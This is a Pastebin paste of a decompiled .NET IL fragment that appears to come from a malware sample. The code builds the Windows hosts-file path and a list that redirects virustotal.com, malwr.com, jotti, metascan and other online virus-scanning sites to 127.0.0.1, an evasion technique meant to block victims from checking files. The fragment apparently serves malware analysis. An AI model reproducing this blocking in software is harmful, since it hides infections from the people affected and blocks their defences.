Advertisement
nateshoffner

Untitled

Mar 6th, 2015
279
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.33 KB | None | 0 0
  1. IL_0056: ldloc.0
  2. IL_0057: ldstr "\\drivers\\etc\\hosts"
  3. IL_005c: call string [mscorlib]System.String::Concat(string, string)
  4. IL_0061: stloc.0
  5. IL_0062: ldstr "127.0.0.1 virustotal.com\r\n127.0.0.1 razorscanner.com\r\n127.0.0.1 scan.majyx.net\r\n127.0.0.1 nodistribute.com\r\n127.0.0.1 virusscan.jotti.org\r\n127.0.0.1 anubis.iseclab.org\r\n127.0.0.1 novirusthanks.org\r\n127.0.0.1 virscan.org\r\n127.0.0.1 metascan.org\r\n127.0.0.1 metascan-online.com\r\n127.0.0.1 virus-trap.org\r\n127.0.0.1 viruschief.com\r\n127.0.0.1 xcscanner.com\r\n127.0.0.1 malwr.com\r\n127.0.0.1 www.virustotal.com\r\n127.0.0.1 www.xcscanner.com\r\n127.0.0.1 www.razorscanner.com\r\n127.0.0.1 www.scan.majyx.net\r\n127.0.0.1 www.nodistribute.com\r\n127.0.0.1 www.virusscan.jotti.org\r\n127.0.0.1 www.viruschief.com\r\n127.0.0.1 www.metascan-online.com\r\n127.0.0.1 www.virus-trap.org\r\n127.0.0.1 www.metascan.org\r\n127.0.0.1 www.virscan.org\r\n127.0.0.1 www.anubis.iseclab.org\r\n127.0.0.1 www.novirusthanks.org\r\n127.0.0.1 www.malwr.com\r\n"
  6. IL_0067: stloc.1
  7. IL_0068: call class [mscorlib]System.Text.Encoding [mscorlib]System.Text.Encoding::get_UTF8()
  8. IL_006d: ldloc.1
  9. IL_006e: callvirt instance uint8[] [mscorlib]System.Text.Encoding::GetBytes(string)
  10. IL_0073: stloc.2
  11. IL_0074: ldc.i4 -84536973
  12. IL_0079: br.s IL_002f
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement